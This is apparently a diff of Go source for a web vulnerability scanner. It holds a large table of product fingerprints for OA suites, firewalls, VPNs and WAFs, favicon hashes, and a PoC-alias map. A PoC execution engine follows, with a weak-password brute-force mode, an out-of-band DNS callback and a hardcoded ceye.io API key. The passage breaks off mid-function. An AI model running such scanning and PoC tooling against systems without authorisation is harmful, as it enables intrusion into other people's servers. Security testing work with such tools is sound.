||||
Name string
|
||||
Md5Str string
|
||||
}
|
||||
|
||||
type PocData struct {
|
||||
Name string
|
||||
Alias string
|
||||
}
|
||||
|
||||
var RuleDatas = []RuleData{
|
||||
{"宝塔", "body", "(app.bt.cn/static/app.png|安全入口校验失败|<title>入口校验失败</title>|href=\"http://www.bt.cn/bbs)"},
|
||||
{"深信服防火墙类产品", "code", "(SANGFOR FW)"},
|
||||
{"360网站卫士", "code", "(webscan.360.cn/status/pai/hash|wzws-waf-cgi|zhuji.360.cn/guard/firewall/stopattack.html)"},
|
||||
{"360网站卫士", "headers", "(360wzws|CWAP-waf|zhuji.360.cn|X-Safe-Firewall)"},
|
||||
{"绿盟防火墙", "code", "(NSFOCUS NF)"},
|
||||
{"绿盟防火墙", "headers", "(NSFocus)"},
|
||||
{"Topsec-Waf", "index", `(<META NAME="Copyright" CONTENT="Topsec Network Security Technology Co.,Ltd"/>","<META NAME="DESCRIPTION" CONTENT="Topsec web UI"/>)`},
|
||||
{"Anquanbao", "headers", "(Anquanbao)"},
|
||||
{"BaiduYunjiasu", "headers", "(yunjiasu)"},
|
||||
{"BigIP", "headers", "(BigIP|BIGipServer)"},
|
||||
{"BinarySEC", "headers", "(binarysec)"},
|
||||
{"BlockDoS", "headers", "(BlockDos.net)"},
|
||||
{"CloudFlare", "headers", "(cloudflare)"},
|
||||
{"Cloudfront", "headers", "(cloudfront)"},
|
||||
{"Comodo", "headers", "(Protected by COMODO)"},
|
||||
{"IBM-DataPower", "headers", "(X-Backside-Transport)"},
|
||||
{"DenyAll", "headers", "(sessioncookie=)"},
|
||||
{"dotDefender", "headers", "(dotDefender)"},
|
||||
{"Incapsula", "headers", "(X-CDN|Incapsula)"},
|
||||
{"Jiasule", "headers", "(jsluid=)"},
|
||||
{"KONA", "headers", "(AkamaiGHost)"},
|
||||
{"ModSecurity", "headers", "(Mod_Security|NOYB)"},
|
||||
{"NetContinuum", "headers", "(Cneonction|nnCoection|citrix_ns_id)"},
|
||||
{"Newdefend", "headers", "(newdefend)"},
|
||||
{"Safe3", "headers", "(Safe3WAF|Safe3 Web Firewall)"},
|
||||
{"Safedog", "code", "(404.safedog.cn/images/safedogsite/broswer_logo.jpg)"},
|
||||
{"Safedog", "headers", "(Safedog|WAF/2.0)"},
|
||||
{"SonicWALL", "headers", "(SonicWALL)"},
|
||||
{"Stingray", "headers", "(X-Mapping-)"},
|
||||
{"Sucuri", "headers", "(Sucuri/Cloudproxy)"},
|
||||
{"Usp-Sec", "headers", "(Secure Entry Server)"},
|
||||
{"Varnish", "headers", "(varnish)"},
|
||||
{"Wallarm", "headers", "(wallarm)"},
|
||||
{"阿里云", "code", "(errors.aliyun.com)"},
|
||||
{"WebKnight", "headers", "(WebKnight)"},
|
||||
{"Yundun", "headers", "(YUNDUN)"},
|
||||
{"Yunsuo", "headers", "(yunsuo)"},
|
||||
{"Coding pages", "header", "(Coding Pages)"},
|
||||
{"启明防火墙", "body", "(/cgi-bin/webui?op=get_product_model)"},
|
||||
{"Shiro", "headers", "(=deleteMe|rememberMe=)"},
|
||||
{"Portainer(Docker管理)", "code", "(portainer.updatePassword|portainer.init.admin)"},
|
||||
{"Gogs简易Git服务", "cookie", "(i_like_gogs)"},
|
||||
{"Gitea简易Git服务", "cookie", "(i_like_gitea)"},
|
||||
{"Nexus", "code", "(Nexus Repository Manager)"},
|
||||
{"Nexus", "cookie", "(NX-ANTI-CSRF-TOKEN)"},
|
||||
{"Harbor", "code", "(<title>Harbor</title>)"},
|
||||
{"Harbor", "cookie", "(harbor-lang)"},
|
||||
{"禅道", "code", "(/theme/default/images/main/zt-logo.png)"},
|
||||
{"禅道", "cookie", "(zentaosid)"},
|
||||
{"协众OA", "code", "(Powered by 协众OA)"},
|
||||
{"协众OA", "cookie", "(CNOAOASESSID)"},
|
||||
{"xxl-job", "code", "(分布式任务调度平台XXL-JOB)"},
|
||||
{"atmail-WebMail", "cookie", "(atmail6)"},
|
||||
{"atmail-WebMail", "code", "(/index.php/mail/auth/processlogin|Powered by Atmail)"},
|
||||
{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>)"},
|
||||
{"致远OA", "code", "(/seeyon/common/|/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"},
|
||||
{"discuz", "code", "(content=\"Discuz! X\")"},
|
||||
{"Typecho", "code", "(Typecho</a>)"},
|
||||
{"金蝶EAS", "code", "(easSessionId)"},
|
||||
{"phpMyAdmin", "cookie", "(pma_lang|phpMyAdmin)"},
|
||||
{"phpMyAdmin", "code", "(/themes/pmahomme/img/logo_right.png)"},
|
||||
{"H3C-AM8000", "code", "(AM8000)"},
|
||||
{"360企业版", "code", "(360EntWebAdminMD5Secret)"},
|
||||
{"H3C公司产品", "code", "(service@h3c.com)"},
|
||||
{"H3C ICG 1000", "code", "(ICG 1000系统管理)"},
|
||||
{"Citrix-Metaframe", "code", "(window.location=\"/Citrix/MetaFrame)"},
|
||||
{"H3C ER5100", "code", "(ER5100系统管理)"},
|
||||
{"阿里云CDN", "code", "(cdn.aliyuncs.com)"},
|
||||
{"CISCO_EPC3925", "code", "(Docsis_system)"},
|
||||
{"CISCO ASR", "code", "(CISCO ASR)"},
|
||||
{"H3C ER3200", "code", "(ER3200系统管理)"},
|
||||
{"万户oa", "code", "(/defaultroot/templates/template_system/common/css/|/defaultroot/scripts/|css/css_whir.css)"},
|
||||
{"Spark_Master", "code", "(Spark Master at)"},
|
||||
{"华为_HUAWEI_SRG2220", "code", "(HUAWEI SRG2220)"},
|
||||
{"蓝凌OA", "code", "(/scripts/jquery.landray.common.js)"},
|
||||
{"深信服ssl-vpn", "code", "(login_psw.csp)"},
|
||||
{"华为 NetOpen", "code", "(/netopen/theme/css/inFrame.css)"},
|
||||
{"Citrix-Web-PN-Server", "code", "(Citrix Web PN Server)"},
|
||||
{"juniper_vpn", "code", "(welcome.cgi?p=logo|/images/logo_juniper_reversed.gif)"},
|
||||
{"360主机卫士", "headers", "(zhuji.360.cn)"},
|
||||
{"Nagios", "headers", "(Nagios Access)"},
|
||||
{"H3C ER8300", "code", "(ER8300系统管理)"},
|
||||
{"Citrix-Access-Gateway", "code", "(Citrix Access Gateway)"},
|
||||
{"华为 MCU", "code", "(McuR5-min.js)"},
|
||||
{"TP-LINK Wireless WDR3600", "code", "(TP-LINK Wireless WDR3600)"},
|
||||
{"泛微OA", "headers", "(ecology_JSessionid)"},
|
||||
{"泛微OA", "code", "(/spa/portal/public/index.js)"},
|
||||
{"华为_HUAWEI_ASG2050", "code", "(HUAWEI ASG2050)"},
|
||||
{"360网站卫士", "code", "(360wzb)"},
|
||||
{"Citrix-XenServer", "code", "(Citrix Systems, Inc. XenServer)"},
|
||||
{"H3C ER2100V2", "code", "(ER2100V2系统管理)"},
|
||||
{"zabbix", "cookie", "(zbx_sessionid)"},
|
||||
{"zabbix", "code", "(images/general/zabbix.ico|Zabbix SIA|zabbix-server: Zabbix)"},
|
||||
{"CISCO_VPN", "headers", "(webvpn)"},
|
||||
{"360站长平台", "code", "(360-site-verification)"},
|
||||
{"H3C ER3108GW", "code", "(ER3108GW系统管理)"},
|
||||
{"o2security_vpn", "headers", "(client_param=install_active)"},
|
||||
{"H3C ER3260G2", "code", "(ER3260G2系统管理)"},
|
||||
{"H3C ICG1000", "code", "(ICG1000系统管理)"},
|
||||
{"CISCO-CX20", "code", "(CISCO-CX20)"},
|
||||
{"H3C ER5200", "code", "(ER5200系统管理)"},
|
||||
{"linksys-vpn-bragap14-parintins", "code", "(linksys-vpn-bragap14-parintins)"},
|
||||
{"360网站卫士常用前端公共库", "code", "(libs.useso.com)"},
|
||||
{"H3C ER3100", "code", "(ER3100系统管理)"},
|
||||
{"H3C-SecBlade-FireWall", "code", "(js/MulPlatAPI.js)"},
|
||||
{"360webfacil_360WebManager", "code", "(publico/template/)"},
|
||||
{"Citrix_Netscaler", "code", "(ns_af)"},
|
||||
{"H3C ER6300G2", "code", "(ER6300G2系统管理)"},
|
||||
{"H3C ER3260", "code", "(ER3260系统管理)"},
|
||||
{"华为_HUAWEI_SRG3250", "code", "(HUAWEI SRG3250)"},
|
||||
{"exchange", "code", "(/owa/auth.owa|Exchange Admin Center)"},
|
||||
{"Spark_Worker", "code", "(Spark Worker at)"},
|
||||
{"H3C ER3108G", "code", "(ER3108G系统管理)"},
|
||||
{"Citrix-ConfProxy", "code", "(confproxy)"},
|
||||
{"360网站安全检测", "code", "(webscan.360.cn/status/pai/hash)"},
|
||||
{"H3C ER5200G2", "code", "(ER5200G2系统管理)"},
|
||||
{"华为(HUAWEI)安全设备", "code", "(sweb-lib/resource/)"},
|
||||
{"华为(HUAWEI)USG", "code", "(UI_component/commonDefine/UI_regex_define.js)"},
|
||||
{"H3C ER6300", "code", "(ER6300系统管理)"},
|
||||
{"华为_HUAWEI_ASG2100", "code", "(HUAWEI ASG2100)"},
|
||||
{"TP-Link 3600 DD-WRT", "code", "(TP-Link 3600 DD-WRT)"},
|
||||
{"NETGEAR WNDR3600", "code", "(NETGEAR WNDR3600)"},
|
||||
{"H3C ER2100", "code", "(ER2100系统管理)"},
|
||||
{"jira", "code", "(jira.webresources)"},
|
||||
{"金和协同管理平台", "code", "(金和协同管理平台)"},
|
||||
{"Citrix-NetScaler", "code", "(NS-CACHE)"},
|
||||
{"linksys-vpn", "headers", "(linksys-vpn)"},
|
||||
{"通达OA", "code", "(/static/images/tongda.ico|http://www.tongda2000.com|通达OA移动版|Office Anywhere)"},
|
||||
{"华为(HUAWEI)Secoway设备", "code", "(Secoway)"},
|
||||
{"华为_HUAWEI_SRG1220", "code", "(HUAWEI SRG1220)"},
|
||||
{"H3C ER2100n", "code", "(ER2100n系统管理)"},
|
||||
{"H3C ER8300G2", "code", "(ER8300G2系统管理)"},
|
||||
{"金蝶政务GSiS", "code", "(/kdgs/script/kdgs.js)"},
|
||||
{"Jboss", "code", "(Welcome to JBoss|jboss.css)"},
|
||||
{"Jboss", "headers", "(JBoss)"},
|
||||
{"泛微E-mobile", "code", "(Weaver E-mobile|weaver,e-mobile)"},
|
||||
{"泛微E-mobile", "headers", "(EMobileServer)"},
|
||||
{"齐治堡垒机", "code", "(logo-icon-ico72.png|resources/themes/images/logo-login.png)"},
|
||||
{"ThinkPHP", "headers", "(ThinkPHP)"},
|
||||
{"ThinkPHP", "code", "(/Public/static/js/)"},
|
||||
{"weaver-ebridge", "code", "(e-Bridge,http://wx.weaver)"},
|
||||
{"Laravel", "headers", "(laravel_session)"},
|
||||
{"DWR", "code", "(dwr/engine.js)"},
|
||||
{"swagger_ui", "code", "(swagger-ui/css|\"swagger\":|swagger-ui.min.js)"},
|
||||
{"大汉版通发布系统", "code", "(大汉版通发布系统|大汉网络)"},
|
||||
{"druid", "code", "(druid.index|DruidDrivers|DruidVersion|Druid Stat Index)"},
|
||||
{"Jenkins", "code", "(Jenkins)"},
|
||||
{"红帆OA", "code", "(iOffice)"},
|
||||
{"VMware vSphere", "code", "(VMware vSphere)"},
|
||||
{"打印机", "code", "(打印机|media/canon.gif)"},
|
||||
{"finereport", "code", "(isSupportForgetPwd|FineReport,Web Reporting Tool)"},
|
||||
{"蓝凌OA", "code", "(蓝凌软件|StylePath:\"/resource/style/default/\"|/resource/customization|sys/ui/extend/theme/default/style/profile.css|sys/ui/extend/theme/default/style/icon.css)"},
|
||||
{"GitLab", "code", "(href=\"https://about.gitlab.com/)"},
|
||||
{"Jquery-1.7.2", "code", "(/webui/js/jquerylib/jquery-1.7.2.min.js)"},
|
||||
{"Hadoop Applications", "code", "(/cluster/app/application)"},
|
||||
{"海昌OA", "code", "(/loginmain4/js/jquery.min.js)"},
|
||||
{"帆软报表", "code", "(WebReport/login.html|ReportServer)"},
|
||||
{"帆软报表", "headers", "(数据决策系统)"},
|
||||
{"华夏ERP", "headers", "(华夏ERP)"},
|
||||
{"金和OA", "cookie", "(ASPSESSIONIDSSCDTDBS)"},
|
||||
{"久其财务报表", "code", "(netrep/login.jsp|/netrep/intf)"},
|
||||
{"若依管理系统", "code", "(ruoyi/login.js|ruoyi/js/ry-ui.js)"},
|
||||
{"启莱OA", "code", "(js/jQselect.js|js/jquery-1.4.2.min.js)"},
|
||||
{"智慧校园管理系统", "code", "(DC_Login/QYSignUp)"},
|
||||
{"JQuery-1.7.2", "code", "(webui/js/jquerylib/jquery-1.7.2.min.js)"},
|
||||
{"浪潮 ClusterEngineV4.0", "code", "(0;url=module/login/login.html)"},
|
||||
{"会捷通云视讯平台", "code", "(him/api/rest/v1.0/node/role|him.app)"},
|
||||
{"源码泄露账号密码 F12查看", "code", "(get_dkey_passwd)"},
|
||||
{"Smartbi Insight", "code", "(smartbi.gcf.gcfutil)"},
|
||||
{"汉王人脸考勤管理系统", "code", "(汉王人脸考勤管理系统|/Content/image/hanvan.png|/Content/image/hvicon.ico)"},
|
||||
{"亿赛通-电子文档安全管理系统", "code", "(电子文档安全管理系统|/CDGServer3/index.jsp|/CDGServer3/SysConfig.jsp|/CDGServer3/help/getEditionInfo.jsp)"},
|
||||
{"天融信 TopApp-LB 负载均衡系统", "code", "(TopApp-LB 负载均衡系统)"},
|
||||
{"中新金盾信息安全管理系统", "code", "(中新金盾信息安全管理系统|中新网络信息安全股份有限公司)"},
|
||||
{"好视通", "code", "(深圳银澎云计算有限公司|itunes.apple.com/us/app/id549407870|hao-shi-tong-yun-hui-yi-yuan)"},
|
||||
{"蓝海卓越计费管理系统", "code", "(蓝海卓越计费管理系统|星锐蓝海网络科技有限公司)"},
|
||||
{"和信创天云桌面系统", "code", "(和信下一代云桌面VENGD|/vesystem/index.php)"},
|
||||
{"金山", "code", "(北京猎鹰安全科技有限公司|金山终端安全系统V9.0Web控制台|北京金山安全管理系统技术有限公司|金山V8)"},
|
||||
{"WIFISKY-7层流控路由器", "code", "(深圳市领空技术有限公司|WIFISKY 7层流控路由器)"},
|
||||
{"MetInfo-米拓建站", "code", "(MetInfo|/skin/style/metinfo.css|/skin/style/metinfo-v2.css)"},
|
||||
{"IBM-Lotus-Domino", "code", "(/mailjump.nsf|/domcfg.nsf|/names.nsf|/homepage.nsf)"},
|
||||
{"APACHE-kylin", "code", "(url=kylin)"},
|
||||
{"C-Lodop打印服务系统", "code", "(/CLodopfuncs.js|www.c-lodop.com)"},
|
||||
{"ATLASSIAN-Confluence", "code", "(Atlassian Confluence)"},
|
||||
{"HFS", "code", "(href=\"http://www.rejetto.com/hfs/)"},
|
||||
{"Jellyfin", "code", "(content=\"http://jellyfin.org\")"},
|
||||
{"FIT2CLOUD-JumpServer-堡垒机", "code", "(<title>JumpServer</title>)"},
|
||||
{"Alibaba Nacos", "code", "(<title>Nacos</title>)"},
|
||||
{"Nagios", "headers", "(nagios admin)"},
|
||||
{"Pulse Connect Secure", "code", "(/dana-na/imgs/space.gif)"},
|
||||
{"h5ai", "code", "(powered by h5ai)"},
|
||||
{"jeesite", "cookie", "(jeesite.session.id)"},
|
||||
{"拓尔思SSO", "cookie", "(trsidsssosessionid)"},
|
||||
{"拓尔思WCMv7/6", "cookie", "(com.trs.idm.coSessionId)"},
|
||||
{"天融信脆弱性扫描与管理系统", "code", "(/js/report/horizontalReportPanel.js)"},
|
||||
{"天融信网络审计系统", "code", "(onclick=dlg_download())"},
|
||||
{"天融信日志收集与分析系统", "code", "(天融信日志收集与分析系统)"},
|
||||
{"URP教务系统", "code", "(北京清元优软科技有限公司)"},
|
||||
{"科来RAS", "code", "(科来软件 版权所有|i18ninit.min.js)"},
|
||||
{"正方OA", "code", "(zfoausername)"},
|
||||
{"希尔OA", "code", "(/heeroa/login.do)"},
|
||||
{"泛普建筑工程施工OA", "code", "(/dwr/interface/LoginService.js)"},
|
||||
{"中望OA", "code", "(/IMAGES/default/first/xtoa_logo.png|/app_qjuserinfo/qjuserinfoadd.jsp)"},
|
||||
{"海天OA", "code", "(HTVOS.js)"},
|
||||
{"信达OA", "code", "(http://www.xdoa.cn</a>)"},
|
||||
{"任我行CRM", "code", "(CRM_LASTLOGINUSERKEY)"},
|
||||
{"Spammark邮件信息安全网关", "code", "(/cgi-bin/spammark?empty=1)"},
|
||||
{"winwebmail", "code", "(WinWebMail Server|images/owin.css)"},
|
||||
{"浪潮政务系统", "code", "(LangChao.ECGAP.OutPortal|OnlineQuery/QueryList.aspx)"},
|
||||
{"天融信防火墙", "code", "(/cgi/maincgi.cgi)"},
|
||||
{"网神防火墙", "code", "(css/lsec/login.css)"},
|
||||
{"帕拉迪统一安全管理和综合审计系统", "code", "(module/image/pldsec.css)"},
|
||||
{"蓝盾BDWebGuard", "code", "(BACKGROUND: url(images/loginbg.jpg) #e5f1fc)"},
|
||||
{"Huawei SMC", "code", "(Script/SmcScript.js?version=)"},
|
||||
{"coremail", "code", "(/coremail/bundle/|contextRoot: \"/coremail\"|coremail/common)"},
|
||||
{"activemq", "code", "(activemq_logo|Manage ActiveMQ broker)"},
|
||||
{"锐捷网络", "code", "(static/img/title.ico|support.ruijie.com.cn|Ruijie - NBR|eg.login.loginBtn)"},
|
||||
{"禅道", "code", "(/theme/default/images/main/zt-logo.png|zentaosid)"},
|
||||
{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>|<TITLE>Error 404--Not Found</TITLE>|Welcome to Weblogic Application Server|<title>Oracle WebLogic Server 管理控制台</title>)"},
|
||||
{"weblogic", "headers", "(WebLogic)"},
|
||||
{"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif|/seeyon/common/)"},
|
||||
{"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.common.js)"},
|
||||
{"深信服ssl-vpn", "code", "(login_psw.csp|loginPageSP/loginPrivacy.js|/por/login_psw.csp)"},
|
||||
{"Struts2", "code", "(org.apache.struts2|Struts Problem Report|struts.devMode|struts-tags|There is no Action mapped for namespace)"},
|
||||
{"泛微OA", "code", "(/spa/portal/public/index.js|wui/theme/ecology8/page/images/login/username_wev8.png|/wui/index.html#/?logintype=1)"},
|
||||
{"Swagger UI", "code", "(/swagger-ui.css|swagger-ui-bundle.js|swagger-ui-standalone-preset.js)"},
|
||||
{"金蝶政务GSiS", "code", "(/kdgs/script/kdgs.js|HTML5/content/themes/kdcss.min.css|/ClientBin/Kingdee.BOS.XPF.App.xap)"},
|
||||
{"蓝凌OA", "code", "(蓝凌软件|StylePath:\"/resource/style/default/\"|/resource/customization|sys/ui/extend/theme/default/style/icon.css|sys/ui/extend/theme/default/style/profile.css)"},
|
||||
{"用友NC", "code", "(Yonyou UAP|YONYOU NC|/Client/Uclient/UClient.dmg|logo/images/ufida_nc.png|iufo/web/css/menu.css|/System/Login/Login.asp?AppID=|/nc/servlet/nc.ui.iufo.login.Index)"},
|
||||
{"用友IUFO", "code", "(iufo/web/css/menu.css)"},
|
||||
{"TELEPORT堡垒机", "code", "(/static/plugins/blur/background-blur.js)"},
|
||||
{"JEECMS", "code", "(/r/cms/www/red/js/common.js|/r/cms/www/red/js/indexshow.js|Powered by JEECMS|JEECMS|/jeeadmin/jeecms/index.do)"},
|
||||
{"CMS", "code", "(Powered by .*CMS)"},
|
||||
{"目录遍历", "code", "(Directory listing for /)"},
|
||||
{"向日葵", "code", "({\"success\":false,\"msg\":\"Verification failure\"})"},
|
||||
{"Kubernetes", "code", "(Kubernetes Dashboard</title>|Kubernetes Enterprise Manager|Mirantis Kubernetes Engine|Kubernetes Resource Report)"},
|
||||
{"WordPress", "code", "(/wp-login.php?action=lostpassword|WordPress</title>)"},
|
||||
{"RabbitMQ", "code", "(RabbitMQ Management)"},
|
||||
{"dubbo", "headers", "(Basic realm=\"dubbo\")"},
|
||||
{"Spring env", "code", "(logback)"},
|
||||
{"ueditor", "code", "(ueditor.all.js|UE.getEditor)"},
|
||||
{"亿邮电子邮件系统", "code", "(亿邮电子邮件系统|亿邮邮件整体解决方案)"},
|
||||
}
|
||||
|
||||
var Md5Datas = []Md5Data{
|
||||
{"BIG-IP", "04d9541338e525258daf47cc844d59f3"},
|
||||
{"蓝凌OA", "302464c3f6207d57240649926cfc7bd4"},
|
||||
{"JBOSS", "799f70b71314a7508326d1d2f68f7519"},
|
||||
{"锐捷网络", "d8d7c9138e93d43579ebf2e384745ba8"},
|
||||
{"锐捷网络", "9c21df9129aeec032df8ac15c84e050d"},
|
||||
{"锐捷网络", "a45883b12d753bc87aff5bddbef16ab3"},
|
||||
{"深信服edr", "0b24d4d5c7d300d50ee1cd96059a9e85"},
|
||||
{"致远OA", "cdc85452665e7708caed3009ecb7d4e2"},
|
||||
{"致远OA", "17ac348fcce0b320e7bfab3fe2858dfa"},
|
||||
{"致远OA", "57f307ad3764553df84e7b14b7a85432"},
|
||||
{"致远OA", "3c8df395ec2cbd72782286d18a286a9a"},
|
||||
{"致远OA", "2f761c27b6b7f9386bbd61403635dc42"},
|
||||
{"齐治堡垒机", "48ee373f098d8e96e53b7dd778f09ff4"},
|
||||
{"SpringBoot", "0488faca4c19046b94d07c3ee83cf9d6"},
|
||||
{"ThinkPHP", "f49c4a4bde1eec6c0b80c2277c76e3db"},
|
||||
{"通达OA", "ed0044587917c76d08573577c8b72883"},
|
||||
{"泛微E-mobile", "41eca7a9245394106a09b2534d8030df"},
|
||||
{"泛微OA", "c27547e27e1d2c7514545cd8d5988946"},
|
||||
{"泛微OA", "9b1d3f08ede38dbe699d6b2e72a8febb"},
|
||||
{"泛微OA", "281348dd57383c1f214ffb8aed3a1210"},
|
||||
{"GitLab", "85c754581e1d4b628be5b7712c042224"},
|
||||
{"Hikvision-视频监控", "89b932fcc47cf4ca3faadb0cfdef89cf"},
|
||||
{"华夏erp", "c68b15c45cf80115a943772f7d0028a6"},
|
||||
{"OpenSNS", "08711abfb016a55c0e84f7b54bef5632"},
|
||||
{"MetInfo-米拓建站", "2a9541b5c2225ed2f28734c0d75e456f"},
|
||||
{"IBM-Lotus-Domino", "36c1002bb579edf52a472b9d2e39bb50"},
|
||||
{"IBM-Lotus-Domino", "639b61409215d770a99667b446c80ea1"},
|
||||
{"ATLASSIAN-Confluence", "b91d19259cf480661ef93b67beb45234"},
|
||||
{"activemq", "05664fb0c7afcd6436179437e31f3aa6"},
|
||||
{"coremail", "ad74ff8f9a2f630fc2c5e6b3aa0a5cb8"},
|
||||
}
|
||||
|
||||
var PocDatas = []PocData{
|
||||
{"致远OA", "seeyon"},
|
||||
{"泛微OA", "weaver"},
|
||||
{"通达OA", "tongda"},
|
||||
{"蓝凌OA", "landray"},
|
||||
{"ThinkPHP", "thinkphp"},
|
||||
{"Nexus", "nexus"},
|
||||
{"齐治堡垒机", "qizhi"},
|
||||
{"weaver-ebridge", "weaver-ebridge"},
|
||||
{"weblogic", "weblogic"},
|
||||
{"zabbix", "zabbix"},
|
||||
{"VMware vSphere", "vmware"},
|
||||
{"Jboss", "jboss"},
|
||||
{"用友", "yongyou"},
|
||||
{"用友IUFO", "yongyou"},
|
||||
{"coremail", "coremail"},
|
||||
{"金山", "kingsoft"},
|
||||
}
|
|
@ -0,0 +1,550 @@
|
|||
package lib
|
||||
|
||||
import (
|
||||
"crypto/md5"
|
||||
"fmt"
|
||||
"github.com/google/cel-go/cel"
|
||||
"example.com/fxscan/Web_Scan/info"
|
||||
"example.com/fxscan/common"
|
||||
"math/rand"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"regexp"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
)
|
||||
|
||||
var (
|
||||
ceyeApi = "a78a1cb49d91fe09e01876078d1868b2"
|
||||
ceyeDomain = "7wtusr.ceye.io"
|
||||
)
|
||||
|
||||
type Task struct {
|
||||
Req *http.Request
|
||||
Poc *Poc
|
||||
}
|
||||
|
||||
func CheckMultiPoc(req *http.Request, pocs []*Poc, workers int) {
|
||||
tasks := make(chan Task)
|
||||
var wg sync.WaitGroup
|
||||
for i := 0; i < workers; i++ {
|
||||
go func() {
|
||||
for task := range tasks {
|
||||
isVul, _, name := executePoc(task.Req, task.Poc)
|
||||
if isVul {
|
||||
result := fmt.Sprintf("[+] %s %s %s", task.Req.URL, task.Poc.Name, name)
|
||||
common.LogSuccess(result)
|
||||
}
|
||||
wg.Done()
|
||||
}
|
||||
}()
|
||||
}
|
||||
for _, poc := range pocs {
|
||||
task := Task{
|
||||
Req: req,
|
||||
Poc: poc,
|
||||
}
|
||||
wg.Add(1)
|
||||
tasks <- task
|
||||
}
|
||||
wg.Wait()
|
||||
close(tasks)
|
||||
}
|
||||
|
||||
func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
|
||||
c := NewEnvOption()
|
||||
c.UpdateCompileOptions(p.Set)
|
||||
if len(p.Sets) > 0 {
|
||||
var setMap StrMap
|
||||
for _, item := range p.Sets {
|
||||
if len(item.Value) > 0 {
|
||||
setMap = append(setMap, StrItem{item.Key, item.Value[0]})
|
||||
} else {
|
||||
setMap = append(setMap, StrItem{item.Key, ""})
|
||||
}
|
||||
}
|
||||
c.UpdateCompileOptions(setMap)
|
||||
}
|
||||
env, err := NewEnv(&c)
|
||||
if err != nil {
|
||||
fmt.Printf("[-] %s environment creation error: %s\n", p.Name, err)
|
||||
return false, err, ""
|
||||
}
|
||||
req, err := ParseRequest(oReq)
|
||||
if err != nil {
|
||||
fmt.Printf("[-] %s ParseRequest error: %s\n", p.Name, err)
|
||||
return false, err, ""
|
||||
}
|
||||
variableMap := make(map[string]interface{})
|
||||
defer func() { variableMap = nil }()
|
||||
variableMap["request"] = req
|
||||
for _, item := range p.Set {
|
||||
k, expression := item.Key, item.Value
|
||||
if expression == "newReverse()" {
|
||||
if !common.DnsLog {
|
||||
return false, nil, ""
|
||||
}
|
||||
variableMap[k] = newReverse()
|
||||
continue
|
||||
}
|
||||
err, _ = evalset(env, variableMap, k, expression)
|
||||
if err != nil {
|
||||
fmt.Printf("[-] %s evalset error: %v\n", p.Name, err)
|
||||
}
|
||||
}
|
||||
success := false
|
||||
//爆破模式,比如tomcat弱口令
|
||||
if len(p.Sets) > 0 {
|
||||
success, err = clusterpoc(oReq, p, variableMap, req, env)
|
||||
return success, nil, ""
|
||||
}
|
||||
|
||||
DealWithRule := func(rule Rules) (bool, error) {
|
||||
Headers := cloneMap(rule.Headers)
|
||||
var (
|
||||
flag, ok bool
|
||||
)
|
||||
for k1, v1 := range variableMap {
|
||||
_, isMap := v1.(map[string]string)
|
||||
if isMap {
|
||||
continue
|
||||
}
|
||||
value := fmt.Sprintf("%v", v1)
|
||||
for k2, v2 := range Headers {
|
||||
if !strings.Contains(v2, "{{"+k1+"}}") {
|
||||
continue
|
||||
}
|
||||
Headers[k2] = strings.ReplaceAll(v2, "{{"+k1+"}}", value)
|
||||
}
|
||||
rule.Path = strings.ReplaceAll(rule.Path, "{{"+k1+"}}", value)
|
||||
rule.Body = strings.ReplaceAll(rule.Body, "{{"+k1+"}}", value)
|
||||
}
|
||||
|
||||
if oReq.URL.Path != "" && oReq.URL.Path != "/" {
|
||||
req.Url.Path = fmt.Sprint(oReq.URL.Path, rule.Path)
|
||||
} else {
|
||||
req.Url.Path = rule.Path
|
||||
}
|
||||
// 某些poc没有区分path和query,需要处理
|
||||
req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
|
||||
//req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")
|
||||
|
||||
newRequest, err := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, string([]rune(req.Url.Path))), strings.NewReader(rule.Body))
|
||||
if err != nil {
|
||||
//fmt.Println("[-] newRequest error: ",err)
|
||||
return false, err
|
||||
}
|
||||
newRequest.Header = oReq.Header.Clone()
|
||||
for k, v := range Headers {
|
||||
newRequest.Header.Set(k, v)
|
||||
}
|
||||
Headers = nil
|
||||
resp, err := DoRequest(newRequest, rule.FollowRedirects)
|
||||
newRequest = nil
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
variableMap["response"] = resp
|
||||
// 先判断响应页面是否匹配search规则
|
||||
if rule.Search != "" {
|
||||
result := doSearch(rule.Search, GetHeader(resp.Headers)+string(resp.Body))
|
||||
if result != nil && len(result) > 0 { // 正则匹配成功
|
||||
for k, v := range result {
|
||||
variableMap[k] = v
|
||||
}
|
||||
} else {
|
||||
return false, nil
|
||||
}
|
||||
}
|
||||
out, err := Evaluate(env, rule.Expression, variableMap)
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
//fmt.Println(fmt.Sprintf("%v, %s", out, out.Type().TypeName()))
|
||||
//如果false不继续执行后续rule
|
||||
// 如果最后一步执行失败,就算前面成功了最终依旧是失败
|
||||
flag, ok = out.Value().(bool)
|
||||
if !ok {
|
||||
flag = false
|
||||
}
|
||||
return flag, nil
|
||||
}
|
||||
|
||||
DealWithRules := func(rules []Rules) bool {
|
||||
successFlag := false
|
||||
for _, rule := range rules {
|
||||
flag, err := DealWithRule(rule)
|
||||
if err != nil || !flag { //如果false不继续执行后续rule
|
||||
successFlag = false // 如果其中一步为flag,则直接break
|
||||
break
|
||||
}
|
||||
successFlag = true
|
||||
}
|
||||
return successFlag
|
||||
}
|
||||
|
||||
if len(p.Rules) > 0 {
|
||||
success = DealWithRules(p.Rules)
|
||||
} else {
|
||||
for _, item := range p.Groups {
|
||||
name, rules := item.Key, item.Value
|
||||
success = DealWithRules(rules)
|
||||
if success {
|
||||
return success, nil, name
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return success, nil, ""
|
||||
}
|
||||
|
||||
func doSearch(re string, body string) map[string]string {
|
||||
r, err := regexp.Compile(re)
|
||||
